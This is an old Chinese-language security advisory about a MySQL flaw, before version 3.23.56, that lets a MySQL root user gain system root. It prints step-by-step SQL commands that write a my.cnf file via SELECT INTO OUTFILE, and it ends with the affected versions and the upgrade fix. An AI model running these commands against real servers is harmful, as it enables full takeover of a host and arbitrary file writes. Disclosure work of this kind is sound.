MySQL ROOT用户可得到系统ROOT权限

/ns/ld/softld/data/20030507053130.htm

发现：Gufion
作者：NetDemon
Http://www.20cn.net/

在 /etc 目录下有 my.cnf的情况下，通过以下操作，可让mysqld在重新启动之后以ROOT身份运行，

用mysql root连接并输入如下命令：

mysql>CREATE DATABASE roottext;
mysql>USE roottext;
mysql>CREATE TABLE hack (conf VARCHAR(80));
mysql>INSERT IN hack VALUES ('[mysqld]');
mysql>INSERT IN hack VALUES ('user=root');
mysql>SELECT * INTO OUTFILE '/path/to/mysql/datadir/my.cnf' FROM hack
mysql>QUIT

这样便在mysql的数据目录创建一个含有下面内容的文件my.cnf

[mysqld]
user=root

在mysql重起之后，此文件将覆盖 /etc/my.cnf的内容，mysqld将以root身份运行，这意味着你也同时拥有系统的root权限了，如通过使用创建适当形式的数据表并通过 INTO OUTFILE 创建或改写目标主机上任意文件等


说明：

尽管此漏洞需要获得MySQL的root密码，这事实上是大多数系统root才掌握的密码。不过因为此密码通常比系统的root密码更容易得到，如果入侵者获得此密码，利用此漏洞，这个系统将彻底被控制。特别在mysql <= 3.23.53 的情况下，得到mysql的root的exploit已经早就能在internet上找到了。因此这个漏洞具有相当大的危险性


有此漏洞版本：小于 MySQL 3.23.56 的所有版本

解决方法：升级到 MySQL 3.23.56
===============================================
本文版权属20CN网络安全小组及其作者所有,如有转载,请保持文章完整性并注明出处
文章类型:原创 提交:NetDemon 核查:NetDemon